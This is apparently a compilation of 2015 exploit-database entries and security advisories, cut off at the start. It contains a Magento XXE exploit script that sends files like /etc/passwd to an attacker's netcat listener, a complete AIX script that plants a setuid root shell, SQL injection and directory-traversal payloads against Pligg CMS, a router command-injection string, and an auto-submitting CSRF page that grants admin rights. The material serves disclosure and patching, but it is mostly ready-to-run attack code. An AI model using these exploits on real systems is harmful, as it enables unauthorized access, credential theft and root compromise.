retrieval XXE payload SEND_DTD="<?xml version=\"1.0\" encoding=\"UTF-8\"?> <!ENTITY % all \"<!ENTITY &#37; send SYSTEM 'php://filter/read=/resource=http://$RECEIVER_HOST:$RECEIVER_PORT/fetch.php?D=%file;'>\"> %all;" SEND_DTD_B64="`echo "$SEND_DTD" | base64 -w0`" FILE_PAYLOAD_XML="<?xml version=\"1.0\" encoding=\"UTF-16\"?> <!DOCTYPE foo [ <!ENTITY % file SYSTEM \"php://filter/convert.base64-encode/resource=$FILE\"> <!ENTITY % dtd SYSTEM \"data://text/plain;base64,$SEND_DTD_B64\"> %dtd; %send; ]>" # Retrieve $FILE from the remote server and send it to $RECEIVER_HOST:$RECEIVER_PORT echo "$FILE_PAYLOAD_XML" | iconv -f UTF-8 -t UTF-16 > $PAYLOAD_TMP_FILE echo -e "Target URL: $TARGETURL\n\nInjecting XXE payload to retrieve the $FILE file..." echo -e "If successful, Base64 encoded result will be sent to http://$RECEIVER_HOST:$RECEIVER_PORT/fetch.php/D=[base64_result]\n" echo -e "If in doubt, try the vulnerability test option.\n" wget -t 1 -v -T $TIMEOUT -O /dev/stdout $TARGETURL --post-file=$PAYLOAD_TMP_FILE fi -------------------------------- The above exploit uses the Out of band XXE payload which sends any retrieved data back to the attacker even though the attacker cannot see the resulting file in the server's response directly. This exploit also bypasses the LIBXML_NONET libxml setting imposed by the Zend Framework which prohibits network access. This is achieved through the usage of php://filter wrapper which is treated as a local resource by the XML ENTITY handler even though it references remote resources. Successful exploitation in a test mode ('Vulnerability test', exploit run without parameters other than the URL to Magento SOAP API) will result in a time out and an internal server error caused by the XML ENTITY accessing /dev/random file which will block the API script. For example: --- $ ./magento-soap-exploit.sh http://vulnhost/magento/index.php/api/soap/index Target URL: http://vulnhost/magento/index.php/api/soap/index Injecting Test XXE payload (/dev/random). Might take a few seconds. --2015-05-19 22:14:17-- http://vulnhost/magento/index.php/api/soap/index Resolving precise (vulnhost)... 127.0.0.1 Connecting to vulnhost (vulnhost)|127.0.0.1|:80... connected. HTTP request sent, awaiting response... Read error (Connection timed out) in headers. Giving up. Vulnerable. No response from Magento for 6 seconds :) --- Arbitrary file accessible to the PHP process can also be fetched with the above exploit by using the following syntax: --- attacker$ ./magento-soap-exploit.sh http://vulnhost/magento/index.php/api/soap/index /etc/passwd attackershost 9090 Target URL: http://vulnhost/magento/index.php/api/soap/index Injecting XXE payload to retrieve the /etc/passwd file... If successful, Base64 encoded result will be sent to http://attackershost:9090/fetch.php/D=[base64_result] If in doubt, try the vulnerability test option. --2015-05-19 22:33:06-- http://vulnhost/magento/index.php/api/soap/index Resolving vulnhost (vulnhost)... 192.168.57.12 Connecting to vulnhost (vulnhost)|192.168.57.12|:80... connected. HTTP request sent, awaiting response... Read error (Connection timed out) in headers. Giving up. --- The result will be sent to attacker's server listening on port 9090 which needs to be set up before running the exploit: --- attacker# nc -vv -l 9090 Listening on [0.0.0.0] (family 0, port 9090) Connection from [192.168.57.12] port 9090 [tcp/*] accepted (family 2, sport 47227) GET /fetch.php?D=cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovYmluL3NoCmJpbjp4OjI6MjpiaW46L2JpbjovYmluL3NoCnN5czp4OjM6MzpzeXM6L2RldjovYmluL3NoCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovY[...cut...] HTTP/1.0 Host: attackershost:9090 attacker# echo 'cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovYmluL3NoCmJpbjp4OjI6MjpiaW46L2JpbjovYmluL3NoCnN5czp4OjM6MzpzeXM6L2RldjovYmluL3NoCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovY' | base64 -d root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh [...] --- It may also be possible to execute arbitrary commands on the remote server if the remote PHP installation has the 'expect' module enabled. In such case, an attacker could use expect:// wrapper within XML ENTITY to execute any command in the context of the PHP process. For example, by adding the XML entity of: <ENTITY % file SYSTEM "expect://id"> the attacker could execute the /usr/bin/id command on the remote Magento host. VI. BUSINESS IMPACT ------------------------- This issue should be marked as high/critical due to the wide deployment of eBay Magento software, low complexity of exploitation, as well as a possibility of an unauthenticated remote exploitation as demonstrated in this advisory. If successful, an attacker could access sensitive files available to the web server process, cause Denial Of Service, or even execute arbitrary commands on the server with the permissions of the PHP/web process if certain PHP modules are installed. There is also a growing number of servers set up to serve PHP code with PHP-FPM, especially in web hosting environments which need to respond to heavy load. There are official Magento tutorials explaining how to set up Magento with Nginx and PHP FPM for best performance: http://info.magento.com/rs/magentocommerce/images/ MagentoECG-PoweringMagentowithNgnixandPHP-FPM.pdf VII. SYSTEMS AFFECTED ------------------------- Versions of eBay Magento CE equal to 1.9.2.1, or older can be exploited on a web server with PHP-FPM SAPI. eBay Magento EE was not tested, but is also affected by this issue according to the vendor (see APPSEC-1045), up to version EE 1.14.2.1. To be exploitable, the system must have a version of libxml library which expands XML entities without additional libxml2 settings. This is true for older versions, as well as newer versions of libxml2 with missing updates, such as a fairly recent patch for the issue of CVE-2014-0191. For some distributions (see references below) libxml2 patches were released as late as April 2015, and for this reason, there are likely many systems which still lack the libml2 updates and allow to exploit the Magento/Zend vulnerability described in this advisory. The exploit however does not depend on a PHP version installed. In fact, the exploit was confirmed to work on Fedora 21 with a new (a month's old) PHP version of: PHP Version => 5.6.14 Build Date => Sep 30 2015 13:53:16 The issue can also be exploited on multiple web servers, as PHP-FPM can be set up on popular web servers such as Apache, or Nginx on Linux/Unix, as well as Windows systems (as per the 'fpm on cygwin' setup guides available on the Internet). VIII. SOLUTION ------------------------- eBay Magento was informed about the issue and assigned it a reference ID of APPSEC-1045. eBay released a patch bundle titled: 'SUPEE-6788 Patch Bundle' prior to the release of this advisory. To address the vulnerability, the patch should be installed, or Magento should be upgraded to the latest version of 1.9.2.2 which already contains the fix. IX. REFERENCES ------------------------- http://legalhackers.com/advisories/eBay-Magento-XXE-Injection-Vulnerability.txt http://legalhackers.com/advisories/zend-framework-XXE-vuln.txt http://framework.zend.com/security/advisory/ZF2015-06 Powering Magento with Ngnix and PHP-FPM: http://info.magento.com/rs/magentocommerce/images/MagentoECG-PoweringMagentowithNgnixandPHP-FPM.pdf http://www.securiteam.com/ http://seclists.org/fulldisclosure/2015/Oct/105 Official eBay Magento website: http://magento.com/ Patch 'SUPEE-6788 Patch Bundle', addressing 'XXE/XEE Attack on Zend XML Functionality Using Multibyte Payloads' (APPSEC-1045) is available at: http://merch.docs.magento.com/ce/user_guide/magento/patch-releases-2015.html CVE-2014-0191 : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0191 https://bugzilla.redhat.com/show_bug.cgi?id=1090976 X. DISCOVERED BY ------------------------- The vulnerability has been discovered by Dawid Golunski dawid (at) legalhackers (dot) com legalhackers.com XI. REVISION HISTORY ------------------------- Oct 29th, 2015: Advisory released Nov 3rd, 2015: Updated exploit to work on newer libxml2 versions such as 2.9.1 without CVE-2014-0191 patch, updated 'Systems affected' section, plus minor updates in other sections XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.

source: https://www.securityfocus.com/bid/60488/info mkCMS is prone to an arbitrary PHP code-execution vulnerability. An attacker can exploit this issue to execute arbitrary PHP code within the context of the affected application. mkCMS 3.6 is vulnerable; other versions may also be affected. http://www.example.com/mkCMS/index.php?cmd=dir

source: https://www.securityfocus.com/bid/60461/info ScriptCase is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/scelta_categoria.php?categoria=[SQLi]

#!/bin/sh # # Exploit Title: AIX 7.1 lquerylv privilege escalation # Date: 2015.10.30 # Exploit Author: S2 Crew [Hungary] # Vendor Homepage: www.ibm.com # Software Link: - # Version: - # Tested on: AIX 7.1 (7100-02-03-1334) # CVE : CVE-2014-8904 # # From file writing to command execution ;) # export _DBGCMD_LQUERYLV=1 umask 0 ln -s /etc/suid_profile /tmp/DEBUGCMD /usr/sbin/lquerylv cat << EOF >/etc/suid_profile cp /bin/ksh /tmp/r00tshell /usr/bin/syscall setreuid 0 0 chown root:system /tmp/r00tshell chmod 6755 /tmp/r00tshell EOF /opt/IBMinvscout/bin/invscoutClient_VPD_Survey # suid_profile because uid!=euid /tmp/r00tshell

Security Advisory - Curesec Research Team 1. Introduction Affected Product: Pligg CMS 2.0.2 Fixed in: not fixed Fixed Version Link: n/a Vendor Website: http://pligg.com/ Vulnerability Type: Directory Traversal Remote Exploitable: Yes Reported to vendor: 09/01/2015 Disclosed to public: 10/07/2015 Release mode: Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Vulnerability Description The editor delivered with Pligg CMS is vulnerable to directory traversal, which gives an attacker that obtained admin credentials the opportunity to view any file stored on the webserver that the webserver user has access to. Please note that admin credentials are required. 3. Proof of Concept POST /pligg-cms-master/admin/admin_editor.php HTTP/1.1 the_file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&open=Open 4. Solution This issue was not fixed by the vendor. 5. Report Timeline 09/01/2015 Informed Vendor about Issue (no reply) 09/22/2015 Reminded Vendor of disclosure date 09/22/2015 Vendor replied, issue has been send to staff 09/29/2015 Reminded Vendor of disclosure date (no reply) 10/07/2015 Disclosed to public Blog Reference: http://blog.curesec.com/article/blog/Pligg-CMS-202-Directory-Traversal-81.html

Security Advisory - Curesec Research Team 1. Introduction Affected Product: Pligg CMS 2.0.2 Fixed in: not fixed Fixed Version Link: n/a Vendor Website: http://pligg.com/ Vulnerability Type: SQL Injection Remote Exploitable: Yes Reported to vendor: 09/01/2015 Disclosed to public: 10/07/2015 Release mode: Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview There are multiple SQL Injection vulnerabilities in Pligg CMS 2.0.2. One of them does not require any credentials, and allows the direct extraction of data from the database. 3. SQL Injection Description Pligg CMS is vulnerable to SQL injection. It is possible to extract data from all databases that the pligg database user has access to. Credentials are not required. Proof Of Concept http://localhost//pligg-cms-master/story.php?title=google-blabla&reply=1&comment_id=1%20union%20all%20select%201,1,1,1,1,1,1,password,password,1%20from%20mysql.user%20%23 Code /story.php:168 if(isset($_GET['reply']) && !empty($parent_comment_id)){ $main_smarty->assign('the_comments', get_comments(true,0,$_GET['comment_id'])); $main_smarty->assign('parrent_comment_id',$parent_comment_id); } [...] function get_comments ($fetch = false, $parent = 0, $comment_id=0, $show_parent=0){ Global $db, $main_smarty, $current_user, $CommentOrder, $link, $cached_comments; //Set comment order to 1 if it's not set in the admin panel if (isset($_GET['comment_sort'])) setcookie('CommentOrder', $CommentOrder = $_GET['comment_sort'], time()+60*60*24*180); elseif (isset($_COOKIE['CommentOrder'])) $CommentOrder = $_COOKIE['CommentOrder']; if (!isset($CommentOrder)) $CommentOrder = 1; If ($CommentOrder == 1){$CommentOrderBy = "comment_votes DESC, comment_date DESC";} If ($CommentOrder == 2){$CommentOrderBy = "comment_date DESC";} If ($CommentOrder == 3){$CommentOrderBy = "comment_votes ASC, comment_date DESC";} If ($CommentOrder == 4){$CommentOrderBy = "comment_date ASC";} [...] $comments = $db->get_results("SELECT * FROM " . table_comments . " WHERE (comment_status='published' $status_sql) AND comment_link_id=$link->id AND comment_id = $comment_id ORDER BY " . $CommentOrderBy); 4. Blind SQL Injection (Admin Area) Description There is a blind SQL Injection in the admin area of Pligg CMS. This allows an attacker that gained admin credentials to extract data from the database. The problem exists because the index of the submitted "enabled" POST array is used in a query. The value is escaped - so using quotes in the injection is not possible - but it does not place the value in between quotes. Proof Of Concept POST /pligg-cms-master/admin/admin_users.php HTTP/1.1 frmsubmit=userlist&admin_acction=2&token=VALID_CSRF_TOKEN&all1=on&enabled[2 AND IF(SUBSTRING(version(), 1, 1)%3D5,BENCHMARK(500000000,version()),null) %23]=1 Code // admin/admin_users.php foreach($_POST["enabled"] as $id => $valuea) { $_GET['id'] = $id = $db->escape($id); $user= $db->get_row('SELECT * FROM ' . table_users ." where user_id=$id"); 5. Possibly SQL Injection Description The upload module is vulnerable to Blind SQL Injection via the "comment" as well as "id" parameter. The module seems to be unused at the moment, but if it were to be used in the future, or if an attacker finds a different way to execute it, it would be vulnerable. The requests to trigger the vulnerabilities would be: POST http://localhost/pligg-cms-master/modules/upload/upload.php id=1&number=1&comment=1' AND IF(SUBSTRING(version(), 1, 1)%3D5,BENCHMARK(500000000,version()),null) %23 POST http://localhost/pligg-cms-master/modules/upload/upload.php id=1<script' or 1%3D1%23></script>&number=1&comment=1 Code ./modules/upload/upload.php: if ($_POST['id']) { $linkres=new Link; $linkres->id = sanitize($_POST['id'], 3); if(!is_numeric($linkres->id)) die("Wrong ID"); if(!is_numeric($_POST['number']) || $_POST['number']<=0) die("Wrong number"); if($_POST['number'] > get_misc_data('upload_maxnumber')) die("Too many files"); // Remove old file and thumbnails with same number $sql = "SELECT * FROM ".table_prefix."files WHERE ".($isadmin ? "" : "file_user_id='{$current_user->user_id}' AND")." file_link_id='{$_POST['id']}' AND file_number='{$_POST['number']}' AND file_comment_id='$_POST[comment]'"; The first problem is that $_POST[comment] is never sanitized. The second problem is that $_POST['id'] is first sanitized by removing tags, then it is checked if that result is nummeric, and finally the original POST value is used. Because of this, it is possible to put the injection inside tags to bypass the check. 6. Solution This issue was not fixed by the vendor. 7. Report Timeline 09/01/2015 Informed Vendor about Issue (no reply) 09/22/2015 Reminded Vendor of disclosure date 09/22/2015 Vendor replied, issue has been send to staff 09/29/2015 Reminded Vendor of disclosure date (no reply) 10/07/2015 Disclosed to public Blog Reference: http://blog.curesec.com/article/blog/Pligg-CMS-202-Multiple-SQL-Injections-82.html

# Exploit title: Hitron Router (CGN3ACSMR) - Remote Code Execution # Author: Dolev Farhi (dolevf at protonmail.ch) # Date: 29-10-2015 # Vendor homepage: http://www.hitrontech.com/en/index.php # Software version: 4.5.8.16 # Hardware version: 1A # Details: Hitron routers provide an interface to test connectivity (ping, tracert) via the graphical user interface of the router (Management UI). This interface is vulnerable to code injection using the && argument after the IP address. # Steps to reproduce: 1. Navigate to the dashboard 2. Navigate to the admin tab 3. Type an ip address in the Destination form 4. append any code you want after the ip. Example one: 8.8.8.8 && cat /etc/passwd Result root:$1$27272727:0:0::/:/bin/false nobody:$1$27272727:65535:65535::/:/bin/false rogcesadmin:filtered/:100:100::/:/usr/sbin/cli =============Complete============== Example two: 8.8.8.8 && ip a PID USER VSZ STAT COMMAND 1 root 1268 S init 2 root 0 SW [kthreadd] 3 root 0 SW [ksoftirqd/0] 5 root 0 SW [kworker/u:0] 6 root 0 SW< [khelper] 7 root 0 SW [irq/74-hw_mutex] 8 root 0 SW [sync_supers] 9 root 0 SW [bdi-default] 10 root 0 SW< [kblockd] 11 root 0 SW< [gPunitWorkqueue] 12 root 0 SW [irq/79-punit_in] 13 root 0 SW [kswapd0] 14 root 0 SW< [crypto]

<!-- [+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-PHPSRVMONITOR-PRIV-ESCALATE.txt Vendor: ================================ www.phpservermonitor.org sourceforge.net/projects/phpservermon/files/phpservermon/PHP%20Server%20Monitor%20v3.1.1/phpservermon-3.1.1.zip/download Product: ================================ PHP Server Monitor 3.1.1 Vulnerability Type: ================================= Privilege Escalation / CSRF Vulnerability Details: ===================== PHP Server Monitor uses level 20 for basic user and level 10 for Admins these are stored in Database. Basic users can elevate thier privileges to that of Administrator by crafting an HTTP payload changing their level to '10' then getting an Administrator to click an infected link or visit a malicious website to launch an CSRF attack which will grant the user admin access. This problem is due to no CSRF protection mechanism in place. Exploit code(s): =============== 1) privilege escalation / CSRF --> <!DOCTYPE> <html> <body onLoad="doit()"> <script> function doit(){ var e=document.getElementById('HELL') e.submit() } </script> <form id="HELL" action="http://localhost/phpservermon-3.1.1/?&mod=user&action=save&id=3" method="post"> <input type="text" name="user_name" value="hyp3rlinx" > <input type="text" name="name" value="hyp3rlinx"> <input type="text" name="level" value="10"> <input type="text" name="password" value=""> <input type="text" name="password_repeat" value=""> <input type="text" name="email" value="ghostofsin@abyss.com"> <input type="text" name="mobile" value=""> <input type="text" name="pushover_key" value=""> <input type="text" name="pushover_device" value=""> </form> </body> </html> <!-- Exploitation Technique: ======================= Remote Disclosure Timeline: ========================================================= Vendor Notification: NA Oct 30, 2015 : Public Disclosure Severity Level: ========================================================= High Description: ========================================================== Request Method(s): [+] POST Vulnerable Product: [+] PHP Server Monitor 3.1.1 =========================================================== [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx -->